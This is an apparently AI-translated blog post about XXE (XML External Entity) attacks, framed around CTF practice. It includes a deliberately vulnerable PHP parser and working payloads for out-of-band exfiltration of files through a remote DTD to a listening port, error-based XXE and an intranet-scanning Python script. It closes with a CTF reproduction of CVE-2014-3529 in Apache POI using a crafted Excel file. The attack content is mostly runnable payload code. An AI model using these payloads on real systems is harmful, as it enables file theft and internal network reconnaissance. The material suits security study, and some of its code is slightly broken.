XXE Vulnerability Analysis and Practical Application

May 9, 2020#XXE #安全 #CTF354

AI Translation

This post is translated from Chinese into English through AI.View Original

AI-generated summary

The text discusses XXE (XML External Entity) vulnerabilities and provides common payloads for analysis. It mentions that nested payloads and sending data through parameter entities may not work. The most commonly used method for sending data is preparing two files on a VPS, opening a web service on port 8001, and sending the data to the victim's server on port 8887. The text also mentions another payload method using DTD files. It discusses the XXE error method and provides code for XXE detection on an internal network. Finally, it provides an example analysis of the CVE20143529 vulnerability and includes code and a pom.xml file for reproduction.

Common Payload Analysis#

It seems like everyone is using this test code:

<?php

libxml_disable_entity_loader(false);

$xmlfile = file_get_contents("php://input");
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
var_dump($creds);

Using XML to send data:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY a SYSTEM "http://localhost:8887/aaaaa">
]>
<root>&a;</root>

But when I tried using parameter entities, it seems that I couldn't carry data:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ENTITY % a "http://localhost:8887/aaa">
%a;
]>
<root></root>

Nested entities also don't work:

<?xml version="1.0"?>
<!DOCTYPE message [
	<!ENTITY % file SYSTEM "file:///flag.txt">  
	<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://localhost:8887/?%file;'>">
	%start;
	%send;
]>

The most commonly used method for carrying data:

Prepare two files on your own VPS, I did the experiment on my local machine.

Open a web service on port 8001 on your local machine,

DraggedImage-1

The content of the local.xml file:

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://localhost:8887/?%file;'>">
%start;

This file represents sending the data to another port 8887 after reading it, and then we send the data to the victim's server,

<?xml version="1.0"?>
<!DOCTYPE message [
	<!ENTITY % remote SYSTEM "http://localhost:8001/local.xml">  
	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./flag.txt">
	%remote;
	%send;
]>
<message>1234</message>

Then you can receive the data on port 8887

DraggedImage-2

Another payload also works

DTD file

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://localhost:8887/p=%file;'>">

Payload sent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://localhost:8001/local.xml">
%remote;%int;%send;
]>

Error XXE#

This method p actually mentioned it a long time ago, you can achieve an error through three levels of nested XML

<?xml version="1.0"?>
<!DOCTYPE message [
	<!ELEMENT message ANY>
	<!ENTITY % para1 SYSTEM "file:///flag">
	<!ENTITY % para '
		<!ENTITY &#x25; para2 "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///&#x25;para1;&#x27;>">
		&#x25;para2;
	'>
	%para;
]>
<message>10</message>

XXE Probe Intranet#

import requests
import base64
#Origtional XML that the server accepts

#<xml>

#    <stuff>user</stuff>

#</xml>



def build_xml(string):
    xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""
    xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""
    xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""
    xml = xml + "\r\n" + """<xml>"""
    xml = xml + "\r\n" + """    <stuff>&xxe;</stuff>"""
    xml = xml + "\r\n" + """</xml>"""
    send_xml(xml)

def send_xml(xml):
    headers = {'Content-Type': 'application/xml'}
    x = requests.post('http://127.0.0.1/xml.php', data=xml, headers=headers, timeout=5).text
    coded_string = x.split(' ')[-2] # a little split to get only the base64 encoded value
    print coded_string
#   print base64.b64decode(coded_string)

for i in range(1, 255):
    try:
        i = str(i)
        ip = '192.168.1.' + i
        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
        print string
        build_xml(string)
    except:
      print "error"
continue

Case Analysis#

NetDing Cup 2020 fileJava#

The vulnerability used is CVE20143529

Reproduction code

import org.apache.poi.EncryptedDocumentException;
import org.apache.poi.openxml4j.exceptions.InvalidFormatException;
import org.apache.poi.ss.usermodel.Sheet;
import org.apache.poi.ss.usermodel.Workbook;
import org.apache.poi.ss.usermodel.WorkbookFactory;
import java.io.FileInputStream;
import java.io.IOException;
public class CVE20143529 {
    public static void main(String[] args) throws IOException, EncryptedDocumentException, InvalidFormatException {
        Workbook wb1 = WorkbookFactory.create(new FileInputStream("test1.xlsx"));
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getLastRowNum());
    }
}

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>pxyapache</groupId>
    <artifactId>pxypxy</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>org.apache.poi</groupId>
            <artifactId>poi-ooxml</artifactId>
            <version>3.10-FINAL</version>
        </dependency>
    </dependencies>

</project>

Exploitation process:

Prepare an Excel file:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://localhost:8001/local.xml">
%remote;%int;%send;
]>

Prepare the DTD file

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://localhost:8887/p=%file;'>">

It will read the file and then send it to port 8887

Get the flag by listening

References#

This YouTube video explains it well: https://youtu.be/gjm6VHZa_8s?si=rMGJmuSI9XJNtt_S